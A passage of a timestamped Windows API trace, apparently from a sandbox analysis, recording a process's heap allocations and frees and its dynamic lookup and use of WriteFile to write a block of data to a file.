hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0172.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0172.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0172.203] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0172.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0172.204] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0172.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0172.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0172.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0172.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a00 [0172.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0172.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0172.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0172.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0172.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0172.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0172.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0172.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0172.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0172.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0172.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0172.204] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0172.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0172.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0172.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0172.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0172.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0172.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0172.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0172.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba138 [0172.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0172.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0172.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0172.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0172.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0172.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0172.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0172.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0172.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0172.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0172.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0172.206] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0172.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0172.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0172.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0172.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0172.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0172.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0172.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0172.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0172.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0172.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0172.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0172.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0172.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0172.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0172.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0172.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0172.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0172.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0172.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0172.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0172.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0172.209] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0172.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0172.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0172.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0172.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0172.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0172.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0172.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0172.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0172.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0172.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0172.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0172.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0172.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0172.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.211] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0172.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd840 [0172.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0172.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.212] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0172.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0172.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0172.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0172.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0172.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0172.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0172.212] WriteFile (in: hFile=0x120, lpBuffer=0xa5f008*, nNumberOfBytesToWrite=0x1201f, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesWritten=0x87eae0*=0x1201f, lpOverlapped=0x0) returned 1 [0172.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0172.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0172.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0172.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 